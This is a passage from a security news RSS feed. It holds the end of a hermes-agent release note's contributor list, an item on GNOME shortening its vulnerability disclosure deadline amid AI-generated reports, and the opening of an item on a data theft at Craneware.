<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deacon-botdoctor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deacon-botdoctor">@deacon-botdoctor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DECK6/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DECK6">@DECK6</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepujain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepujain">@deepujain</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derek2000139/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derek2000139">@derek2000139</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/designnotdrum/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/designnotdrum">@designnotdrum</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deusyu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deusyu">@deusyu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devatnull/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devatnull">@devatnull</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devorun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devorun">@devorun</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dexhunter/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dexhunter">@dexhunter</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dfein38347g/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dfein38347g">@dfein38347g</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dhravya/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dhravya">@Dhravya</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DictatorBacon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DictatorBacon">@DictatorBacon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/digitalbase/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/digitalbase">@digitalbase</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlkakbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlkakbs">@dlkakbs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dmabry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dmabry">@dmabry</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DNAlec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DNAlec">@DNAlec</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dodo-reach/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dodo-reach">@dodo-reach</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doncazper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doncazper">@doncazper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dorokuma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dorokuma">@dorokuma</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doxe0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doxe0x">@doxe0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Drexuxux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Drexuxux">@Drexuxux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dschnurbusch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dschnurbusch">@dschnurbusch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dusk1e/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dusk1e">@Dusk1e</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EdderTalmor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EdderTalmor">@EdderTalmor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/egilewski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/egilewski">@egilewski</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/elashera/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/elashera">@elashera</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Elektrofussel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Elektrofussel">@Elektrofussel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eliteworkstation94-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eliteworkstation94-ai">@eliteworkstation94-ai</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/embwl0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/embwl0x">@embwl0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emo-eth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emo-eth">@emo-eth</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emozilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emozilla">@emozilla</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/enzo-adami/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/enzo-adami">@enzo-adami</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Epoxidex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Epoxidex">@Epoxidex</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ErnestHysa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ErnestHysa">@ErnestHysa</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/esthonjr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/esthonjr">@esthonjr</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evefromwayback/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evefromwayback">@evefromwayback</a>, @evelynburger, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/F4TB0Yz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/F4TB0Yz">@F4TB0Yz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/falkoro/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/falkoro">@falkoro</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fanyangCS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fanyangCS">@fanyangCS</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/firefly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/firefly">@firefly</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fjlaowan1983/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fjlaowan1983">@fjlaowan1983</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flewe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flewe">@flewe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flo1t/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flo1t">@flo1t</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flow-digital-ny/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flow-digital-ny">@flow-digital-ny</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/floze-the-genius/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/floze-the-genius">@floze-the-genius</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frizikk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frizikk">@frizikk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Frowtek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Frowtek">@Frowtek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FuryMartin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FuryMartin">@FuryMartin</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fyzanshaik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fyzanshaik">@fyzanshaik</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gauravsaxena1997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gauravsaxena1997">@gauravsaxena1997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geoffreybutler94/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geoffreybutler94">@geoffreybutler94</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/georgedrury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/georgedrury">@georgedrury</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gigakun3030/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gigakun3030">@gigakun3030</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giggling-ginger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giggling-ginger">@giggling-ginger</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Git-on-my-level/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Git-on-my-level">@Git-on-my-level</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gitcommit90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gitcommit90">@gitcommit90</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/githubespresso407/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/githubespresso407">@githubespresso407</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gnodet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gnodet">@gnodet</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GottZ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GottZ">@GottZ</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gridzilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gridzilla">@Gridzilla</a>, @grimmjoww578, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumclaw">@gumclaw</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gutslabs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gutslabs">@Gutslabs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HaiderSultanArc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HaiderSultanArc">@HaiderSultanArc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/harjothkhara/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/harjothkhara">@harjothkhara</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heathley/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heathley">@heathley</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hejuntt1014/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hejuntt1014">@hejuntt1014</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HeLLGURD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HeLLGURD">@HeLLGURD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hellno/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hellno">@hellno</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/herbalizer404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/herbalizer404">@herbalizer404</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HexLab98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HexLab98">@HexLab98</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hmirin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hmirin">@hmirin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hopfensaft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hopfensaft">@Hopfensaft</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hotragn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hotragn">@Hotragn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hsy5571616/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hsy5571616">@hsy5571616</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/huanshan5195/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/huanshan5195">@huanshan5195</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HumphreySun98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HumphreySun98">@HumphreySun98</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hydracoco7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hydracoco7">@hydracoco7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hydraxman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hydraxman">@hydraxman</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iamlukethedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iamlukethedev">@iamlukethedev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iborazzi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iborazzi">@iborazzi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IgorGanapolsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IgorGanapolsky">@IgorGanapolsky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iizotov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iizotov">@iizotov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ildunari/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ildunari">@ildunari</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/infinitycrew39/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/infinitycrew39">@infinitycrew39</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IpastorSan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IpastorSan">@IpastorSan</a>, @irresi, @isfttr, @isheng-eqi, @itsflownium, @izumi0uu, @Jaaneek, @JacketPants,<br>
@jaisup, @jakelongvu-bot, @jakepresent, @jaketracey, @JAlmanzarMint, @JasonFang1993, @jbbottoms, @jcjc81,<br>
@JiaDe-Wu, @Jiahui-Gu, @Jigoooo, @jingsong-liu, @jneeee, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>, @joelbrilliant, @John-Lussier, @jplew,<br>
@jtstothard, @juniperbevensee, @Jupiter363, @justinschille, @k4z4n0v4, @kaishi00, @karfly, @kartik-mem0,<br>
@kavioavio, @KCAYAAI, @kenyonxu, @keslerm, @kevinrajaram, @knoal, @kocaemre, @kohoj, @konsisumer, @krowd3v,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, @kuangmi-bit, @kubolko, @kyssta-exe, @Kyzcreig, @l0h1nth, @labsobsidian, @laurinaitis,<br>
@LavyaTandel, @lawyer112, @lemonwan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, @lEWFkRAD, @linfeng961, @liuhao1024, @liuwei666888, @ljy-2000,<br>
@loes5050, @logical-and, @LoicHmh, @loongfay, @lord-dubious, @lost9999, @lucasfdale, @lucaskvasirr,<br>
@luxuguang-leo, @ly-wang19, @m0n5t3r, @m1qaweb, @M1racleShih, @MaartenDMT, @mahdiwafy, @MaheshBhushan,<br>
@ManniBr, @marcelohildebrand, @marcolivierlavoie, @markoub, @MarkVLK, @Marxb85, @matantsevs,<br>
@maxpetrusenkoagent, @mbac, @mdc2122, @mguttmann, @Mibayy, @michaelHMK, @mijanx, @minchang, @momomojo,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MorAlekss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MorAlekss">@MorAlekss</a>, @morluto, @msh01, @mssteuer, @mvanhorn, @nanami7777777, @nankingjing, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/necoweb3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/necoweb3">@necoweb3</a>, @neo-claw-bot,<br>
@neoguyverx, @nicha16, @nikshepsvn, @nima20002000, @nnnet, @NousResearch, @nullptr0807, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nv-kasikritc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nv-kasikritc">@nv-kasikritc</a>,<br>
@okisdev, @OmarB97, @ooiuuii, @ooovenenoso, @oppih, @Osraka, @ostravajih, @otsune, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, @OYLFLMH,<br>
@patrick-muller, @pdmartins, @pedrommaiaa, @Peterskaronis, @petrichor-op, @pgregg88, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pierrenode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pierrenode">@pierrenode</a>, @pixel4039,<br>
@plcunha, @pnascimento9596, @Polyhistor, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PRATHAMESH75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PRATHAMESH75">@PRATHAMESH75</a>, @professorpalmer, @Punyko8, @Que0x, @Qwinty,<br>
@r0gersm1th, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r266-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r266-tech">@r266-tech</a>, @rabadaki, @ragingbulld, @RainbowAndSun, @rainbowgore, @randimt, @rarf, @rasitakyol,<br>
@rayjun, @raymondyan-zhijie, @re-ITRT, @RenoMG, @Rival, @RKelln, @rlaehddus302, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>, @rodboev,<br>
@roryford, @rungmc357, @ruslanvasylev, @s0xn1ck, @s905060, @s96919, @sahibzada-allahyar, @sahil-shubham,<br>
@Sahil-SS9, @SahilRakhaiya05, @sam7894604, @SAMBAS123, @samrusani, @sanidhyasin, @sasquatch9818, @sberan,<br>
@ScotterMonk, @seagpt, @sebastianlutycz, @SemonCat, @setclock, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, @sharziki, @shashwatgokhe,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @shuangxinniao, @SilentKnight87, @simplast, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simpolism/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simpolism">@simpolism</a>, @SiteupAgencia, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjiangtao2024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjiangtao2024">@sjiangtao2024</a>, @sk-holmes,<br>
@slow4cyl, @smtony, @soddy022, @Soju06, @solyanviktor-star, @SongotenU, @spiky02plateau, @sprmn24, @SquabbyZ,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>, @ssiweifnag, @stantheman0128, @StellarisW, @stephenschoettler, @suninrain086, @superposition,<br>
@Supersynergy, @sweetcornna, @szafranski, @tanmayxchoudhary, @tarunravi, @tcconnally, @terry197913, @Thatgfsj,<br>
@thegoodguysla, @thestudionorth, @TheTom, @TinkerOfThings, @tjboudreaux, @tjp2021, @Tortugasaur, @Tosko4,<br>
@Tranquil-Flow, @trevorgordon981, @trismegistus-wanderer, @tt-a1i, @tuancookiez-hub, @TurgutKural, @Umi4Life,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/UnathiCodex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/UnathiCodex">@UnathiCodex</a>, @unsupportedpastels, @uzaylisak, @valda, @vampyren, @veradim, @victor-kyriazakos, @virtualex-itv,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishal-dharm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishal-dharm">@vishal-dharm</a>, @Vissirexa, @vizi0uz, @vkkong, @vKongv, @VolodymyrBg, @vortexopenclaw, @VrtxOmega, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>,<br>
@waroffchange, @waseemshahwan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>, @webtecnica, @wesleion, @wesleysimplicio, @williamumu,<br>
@WilsonKinyua, @wxy-nlp, @wyuebei-cloud, @x7peeps, @x9x9x9x9x9x91, @xuezhaolan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, @ya-nsh, @yatesjalex,<br>
@ygd58, @yingliang-zhang, @yinkev, @YLChen-007, @yu-xin-c, @yungchentang, @zapabob, @zccyman, @zeapsu,<br>
@ziliangpeng, @zwcf5200, @zzpigpinggai</p>
<p>Also: bo.fu, Paulo Henrique, kyssta-exe 25470058+kyssta-exe.fu, Paulo Henrique, kyssta-exe 25470058+kyssta-exe.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.7.1...v2026.7.20">v2026.7.1...v2026.7.20</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Catanzaro: Some changes to GNOME security tracking]]></title>
<description><![CDATA[Michael Catanzaro, who has been managing GNOME security issue tracking since
November 2020, has written a blog post that details some changes in how he will
be managing GNOME vulnerability reports from now on due to an increase in
AI-generated security reports. He will be switching from a 90-day ...]]></description>
<link>https://tsecurity.de/de/3681780/linux-tipps/catanzaro-some-changes-to-gnome-security-tracking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681780/linux-tipps/catanzaro-some-changes-to-gnome-security-tracking/</guid>
<pubDate>Mon, 20 Jul 2026 19:05:07 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Michael Catanzaro, who has been managing GNOME security issue tracking since
November 2020, has written a <a href="https://blogs.gnome.org/mcatanzaro/2026/07/20/some-changes-to-gnome-security-tracking/">blog post</a> that details some changes in how he will
be managing GNOME vulnerability reports from now on due to an increase in
AI-generated security reports. He will be switching from a 90-day deadline for
disclosures to 30 days for issues reported on August 1, or later. "<q>The
shorter deadline would probably work better for GNOME even if not for the
increase in AI-generated issue reports.</q>"</p>

<p>He also has indicated that he will be stepping away from the task of managing
security issue tracking entirely by December 1, 2026, which means that there
will be a gap to fill:</p>

<blockquote class="bq">
<p>Currently nobody else is tracking GNOME security issues. If you are an
experienced GNOME community member and you are interested in taking over this
work, let me know and I will help you get started. (Security tracking is not a
good task for newcomers.)</p>

<p>This may also be an opportunity to improve our tracking infrastructure. I use
a <a href="https://gitlab.gnome.org/Teams/Releng/security/-/wikis/home">wiki
page</a>, but this is fairly primitive and requires considerable manual
upkeep. It's easy to forget to update the page when an issue report is closed,
for example. Ideally, we would replace the wiki with a proper web app that
dynamically updates based on the actual state of the issue.</p>
</blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers stole ‘significant’ amount of data from tech firm relied on by thousands of US hospitals and pharmacies]]></title>
<description><![CDATA[Edinburgh-based tech firm Craneware said customer data was stolen during a cyberattack. The company makes software that thousands of U.S. hospitals, pharmacies, and clinics rely on for billing patients, potentially exposing health data. This article has been indexed from Security…
Read more →
The...]]></description>
